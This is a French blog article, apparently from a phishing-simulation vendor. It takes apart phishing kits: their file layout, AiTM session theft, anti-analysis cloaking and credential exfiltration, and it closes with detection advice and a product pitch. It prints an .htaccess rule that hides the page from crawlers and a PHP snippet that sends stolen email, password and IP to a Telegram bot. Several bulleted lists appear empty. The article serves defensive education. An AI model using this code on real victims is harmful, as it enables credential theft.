← Tous les articles

Anatomie d’un kit de phishing moderne

GottaPhish Team · 22 avril 2026

Un « kit de phishing » est le code packagé et réutilisable que les attaquants déploient pour cloner une page de connexion, récolter des identifiants et les exfiltrer. Comprendre comment ces kits sont construits — et comment ils se cachent — facilite grandement la détection précoce des campagnes et la conception de simulations défensives crédibles.

Ce que contient un kit

Un kit typique est une archive ZIP déposée sur un hôte compromis ou un hébergement bon marché. Sa structure est remarquablement constante :

kit/
├── index.php            # la page d'atterrissage clonée
├── login.php            # traitement du formulaire : capture + relaie les identifiants
├── assets/              # copies au pixel près des CSS, JS, logos, polices
├── config.php           # cible d'exfiltration (e-mail, bot Telegram, URL distante)
├── antibots.php         # listes de blocage des crawlers, bacs à sable, chercheurs
└── .htaccess            # réécritures, filtrage géo/IP, protection anti-hotlink

Les kits modernes sont de plus en plus vendus « en tant que service » (PhaaS — Phishing-as-a-Service), avec tableaux de bord par abonnement, mises à jour et support.

Le clone

La page d'atterrissage est en général une copie octet pour octet d'un vrai écran de connexion, capturée avec un aspirateur de site ou un navigateur headless. Deux indices reviennent souvent :

Les kits avancés relaient le vrai site en temps réel (montage adversary-in-the-middle avec des outils comme Evilginx), transmettant la saisie de la victime au serveur légitime et volant le cookie de session obtenu — ce qui contourne la plupart des MFA.

La couche anti-analyse

Le composant antibots est ce qui maintient un kit en vie. Il filtre les visiteurs avant de servir la page de phishing :

# extrait de .htaccess
RewriteCond %{HTTP_USER_AGENT} (googlebot|bingbot|curl|python) [NC]
RewriteRule .* https://vraie-marque.example/ [R=302,L]

Voilà pourquoi une URL qui « semble morte » à un analyste SOC était pleinement active pour la victime quelques minutes plus tôt.

Capture et exfiltration des identifiants

Le traitement valide juste assez pour paraître réel, puis expédie les données. Les canaux d'exfiltration, par popularité décroissante :

$msg = "u={$_POST['email']}&p={$_POST['pass']}&ip={$_SERVER['REMOTE_ADDR']}";
file_get_contents("https://api.telegram.org/bot$TOKEN/sendMessage?chat_id=$ID&text=".urlencode($msg));
header("Location: https://vraie-marque.example/error");

Notez la redirection finale : après un « échec de connexion », la victime atterrit sur le vrai site, croit à une faute de frappe, se connecte avec succès et ne soupçonne rien.

Hébergement et diffusion

Les kits privilégient l'infrastructure jetable : sites WordPress compromis, redirections ouvertes sur des domaines de confiance, domaines sosies fraîchement enregistrés, et de plus en plus des services légitimes (Cloudflare Workers, IPFS, SharePoint, Google Docs) pour emprunter leur réputation. La diffusion associe le kit à un appât — une facture, une « re-vérification » MFA, une notification de document partagé.

Détection défensive

Signaux à chasser :

Vérité inconfortable : un bon kit AiTM contourne la MFA par SMS et par application en volant le jeton de session. Les méthodes résistantes au phishing — FIDO2 / passkeys — sont le correctif durable.

Comment GottaPhish aide

Les kits de phishing modernes s'appuient sur des clones au pixel près et sur le vol de session AiTM, qui contournent même la MFA par SMS et par application. GottaPhish et son équipe d'experts vous aident à affronter précisément cette menace : des simulations sûres et entièrement auditées reproduisant de vrais kits — liens à jeton unique, flux de capture d'identifiants, scénarios AiTM — avec des tableaux de bord montrant quels appâts fonctionnent et où la MFA tient. Nos experts vous accompagnent dans la configuration, conçoivent des scénarios calqués sur les techniques PhaaS actuelles et vous aident à interpréter les résultats sous forme de formation ciblée et de signaux concrets de detection engineering pour votre SOC.